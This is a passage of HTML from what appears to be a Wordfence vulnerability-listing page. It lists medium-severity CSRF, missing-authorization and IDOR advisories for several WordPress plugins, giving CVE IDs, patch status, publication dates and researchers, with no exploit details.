<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be9811b8-602f-4525-bc15-75e5efe794f6" target="_blank" rel="noopener">Fluent Support Pro &lt;= 2.3.1 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78279" target="_blank" rel="noopener noreferrer">							CVE-2026-78279						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support-pro" target="_blank" rel="noopener">Fluent Support Pro</a> <span class="wfvr-software-slug">[fluent-support-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be9811b8-602f-4525-bc15-75e5efe794f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a7b4c3c-a8a0-4f16-bfcb-5c2cd479fb9a" target="_blank" rel="noopener">Fluent Support Pro &lt;= 2.3.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78272" target="_blank" rel="noopener noreferrer">							CVE-2026-78272						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support-pro" target="_blank" rel="noopener">Fluent Support Pro</a> <span class="wfvr-software-slug">[fluent-support-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a7b4c3c-a8a0-4f16-bfcb-5c2cd479fb9a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/941ecfbd-d9d1-4103-aab2-fa843c4f8db3" target="_blank" rel="noopener">FluentBooking Pro &lt;= 2.2.4 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81273" target="_blank" rel="noopener noreferrer">							CVE-2026-81273						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-booking-pro" target="_blank" rel="noopener">Fluent Booking Pro</a> <span class="wfvr-software-slug">[fluent-booking-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/941ecfbd-d9d1-4103-aab2-fa843c4f8db3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/033e9370-368d-4ffa-be6d-3a75e62aa86f" target="_blank" rel="noopener">Frontend Admin by DynamiApps &lt; 3.29.11 &#8211; Authenticated (Subscriber+) Membership Plan Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81346" target="_blank" rel="noopener noreferrer">							CVE-2026-81346						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-frontend-form-element" target="_blank" rel="noopener">Frontend Admin by DynamiApps</a> <span class="wfvr-software-slug">[acf-frontend-form-element]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/033e9370-368d-4ffa-be6d-3a75e62aa86f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08057fa2-90e1-4537-a828-a2c5902b348c" target="_blank" rel="noopener">FundEngine &lt;= 1.8.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification via &#8216;campaign_post&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75930" target="_blank" rel="noopener noreferrer">							CVE-2026-75930						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform</a> <span class="wfvr-software-slug">[wp-fundraising-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08057fa2-90e1-4537-a828-a2c5902b348c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96103ad6-6800-401e-bbda-26ef3215b540" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory &lt;= 2.8.176 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81271" target="_blank" rel="noopener noreferrer">							CVE-2026-81271						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodirectory" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory</a> <span class="wfvr-software-slug">[geodirectory]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96103ad6-6800-401e-bbda-26ef3215b540" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3c065113-8481-4d84-9027-8eb0514ce61a" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder &lt;= 1.4.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78280" target="_blank" rel="noopener noreferrer">							CVE-2026-78280						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[hash-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanghyeok-kim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/62f9ef507ab6589c612d838996c4f1c6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="62f9ef507ab6589c612d838996c4f1c6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanghyeok-kim" target="_blank" rel="noopener">sanghyeok Kim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3c065113-8481-4d84-9027-8eb0514ce61a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/678608e0-2c13-4eb6-8d87-82e74c936225" target="_blank" rel="noopener">LitExtension – Automated Store Migration &amp; Import &lt;= 1.2.6 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15046" target="_blank" rel="noopener noreferrer">							CVE-2026-15046						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litextension-data-migration-to-woocommerce" target="_blank" rel="noopener">LitExtension – Automated Store Migration &amp; Import</a> <span class="wfvr-software-slug">[litextension-data-migration-to-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/marim00" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/57c4de370ed750b5cc57c14f35f00b40.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="57c4de370ed750b5cc57c14f35f00b40"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/marim00" target="_blank" rel="noopener">marim00</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/678608e0-2c13-4eb6-8d87-82e74c936225" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1777d037-d72d-44a6-946a-a97e20bd2839" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt; 3.7.42 &#8211; Authenticated (Custom Role+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81200" target="_blank" rel="noopener noreferrer">							CVE-2026-81200						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1777d037-d72d-44a6-946a-a97e20bd2839" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75dd9fe-0cc9-496a-8c47-ffd98bc63d10" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce &lt;= 0.4.62 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16568" target="_blank" rel="noopener noreferrer">							CVE-2026-16568						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-app-for-woocommerce" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce</a> <span class="wfvr-software-slug">[mobile-app-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75dd9fe-0cc9-496a-8c47-ffd98bc63d10" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ad4aa67-0b40-4dcf-a7f8-0b333f622041" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce &lt;= 0.4.69 &#8211; Missing Authorization to Authenticated (Subscriber+) Stock Update</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16569" target="_blank" rel="noopener noreferrer">							CVE-2026-16569						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-app-for-woocommerce" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce</a> <span class="wfvr-software-slug">[mobile-app-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ad4aa67-0b40-4dcf-a7f8-0b333f622041" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/597dc29a-3a5c-412c-849b-9c5640181d0c" target="_blank" rel="noopener">MStore API – Create Native Android &amp; iOS Apps On The Cloud &lt; 4.21.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Order Completion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18233" target="_blank" rel="noopener noreferrer">							CVE-2026-18233						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api" target="_blank" rel="noopener">MStore API – Create Native Android &amp; iOS Apps On The Cloud</a> <span class="wfvr-software-slug">[mstore-api]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/597dc29a-3a5c-412c-849b-9c5640181d0c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40390942-3112-40da-9ef4-5e4f950035ae" target="_blank" rel="noopener">Newsletters &lt; 4.17 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17522" target="_blank" rel="noopener noreferrer">							CVE-2026-17522						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40390942-3112-40da-9ef4-5e4f950035ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d3eddce-1b41-4a33-8d57-bd594cf06a06" target="_blank" rel="noopener">Newsletters &lt;= 4.17 &#8211; Missing Authorization to Authenticated (Author+) Arbitrary Modification via &#8216;newsletters_mailinglistsroles&#8217; POST Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75908" target="_blank" rel="noopener noreferrer">							CVE-2026-75908						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
